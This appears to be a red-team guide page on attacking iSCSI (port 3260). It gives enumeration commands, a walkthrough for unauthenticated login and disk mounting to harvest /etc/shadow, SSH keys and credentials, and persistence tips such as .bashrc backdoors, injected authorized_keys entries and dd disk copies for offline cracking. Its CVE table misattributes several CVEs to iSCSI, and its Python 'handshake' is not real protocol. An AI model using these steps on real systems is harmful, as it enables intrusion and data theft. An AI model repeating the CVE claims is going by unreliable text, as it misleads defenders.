iScsi - Port 3260

What is iSCSI and Why is it Important?

iSCSI (Internet Small Computer Systems Interface) is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in SAN (Storage Area Network) environments for centralized disk management and remote storage access.

Why iSCSI Matters in Security:

  • High-value targets: iSCSI often connects to critical infrastructure like databases and VMs.

  • Misconfigurations can lead to unauthenticated access or credential leaks.

  • Exposed iSCSI services can reveal disk images, file systems, and even credentials.


How iSCSI Works on Port 3260

Port 3260 handles the iSCSI target communication, where:

  • Initiators (clients) request access to storage blocks.

  • Targets (servers) expose storage resources via Logical Unit Numbers (LUNs).

iSCSI Protocol Flow:

  1. Session Initiation via iSCSI login.

  2. Discovery Phase: Client requests list of available targets.

  3. Authentication: Optional but often skipped or weakly implemented.

  4. Data Transfer: SCSI commands are encapsulated in TCP/IP.


Top Vulnerabilities in iSCSI

Below are common attack vectors in iSCSI deployments:

Vulnerability
Description

No Authentication

Default config allows any initiator to access targets.

Weak CHAP Credentials

Often reused or stored in plaintext.

Information Disclosure

Target names, volume names, and paths can leak sensitive info.

Exposure to the Internet

Misconfigured firewalls or open 3260 ports.

Unpatched CVEs

Older storage devices may run vulnerable firmware.


Enumeration Techniques with Tools (Nmap, Netcat, etc.)

Using Nmap

nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info
  • -p 3260: Scan the iSCSI port

  • --script=iscsi-info: Attempts to extract target name and LUNs

Netcat for Banner Grabbing

nc <target-ip> 3260
  • You may get a raw iSCSI response showing protocol version or session response.

iscsiadm (Linux)

iscsiadm -m discovery -t sendtargets -p <target-ip>
  • Lists available iSCSI targets.

  • Works only if no auth is required or credentials are known.


Manual Exploitation: Hands-On Examples

Step 1: Target Discovery

iscsiadm -m discovery -t sendtargets -p 10.10.10.22

Output:

10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1

Step 2: Login Without Authentication

iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login

If successful, the system will map the remote disk locally (e.g., /dev/sdb).

Step 3: Mount and Explore

fdisk -l
mount /dev/sdb1 /mnt
ls /mnt

Look for:

  • /etc/shadow files

  • Password backups

  • SSH keys

  • Configs containing internal IPs


Automated Exploitation with Tools

Metasploit iSCSI Modules

Metasploit has auxiliary modules for discovery:

msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run

Nikto (Limited)

While Nikto isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.

Custom Python Script Example

import socket

target = "10.10.10.22"
port = 3260

s = socket.socket()
s.connect((target, port))
s.send(b"InitiatorHello")
print(s.recv(1024))
s.close()

Real-World CVEs and Notable Exploits

CVE ID
Description
Link

CVE-2020-2732

iSCSI memory leak in certain Linux kernels

CVE-2015-1420

iSCSI stack buffer overflow in Netgear ReadyNAS

Exploit DB

CVE-2018-1000861

Remote command execution via iSCSI web management interface


Privilege Escalation Opportunities via this Service

Once access is gained to an iSCSI volume:

  • Look for saved credential files

    • .bash_history, .ssh/id_rsa, /etc/shadow

  • Search for sudoers misconfigurations

    cat /mnt/etc/sudoers
  • Enumerate LVM volumes for hidden partitions

    lvscan

If LUNs expose full disk images, mount them locally and search for:

  • SAM/NTDS.dit (Windows)

  • MySQL databases

  • AWS credentials


Post-Exploitation Tips and Persistence

Techniques:

  • Leave a backdoor in iSCSI shared volume

    • e.g., .bashrc modification

  • Enable remote access via hidden SSH key

    • Inject key into /home/user/.ssh/authorized_keys

  • Exfiltrate disk image for offline cracking

    dd if=/dev/sdb of=disk.img bs=1M

Defense, Mitigation, and Hardening Techniques

Best Practices:

  • Always enable CHAP authentication

  • Whitelist initiator IPs

  • Limit access with firewall rules (block 3260 externally)

  • Use VLANs or separate subnets for SAN traffic

  • Regularly patch iSCSI daemons and firmware

Monitoring Tips:

  • Use Wireshark to inspect unauthorized iSCSI sessions.

  • Set up Syslog alerts for unusual discovery requests.


A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.


Last updated

Was this helpful?